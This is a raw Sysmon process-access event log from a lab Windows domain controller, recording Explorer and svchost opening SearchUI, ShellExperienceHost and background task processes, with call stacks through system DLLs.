07:51:36.230{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.214{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048338Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048337Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048336Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048335Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048334Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048333Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048332Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048331Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:36.199{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 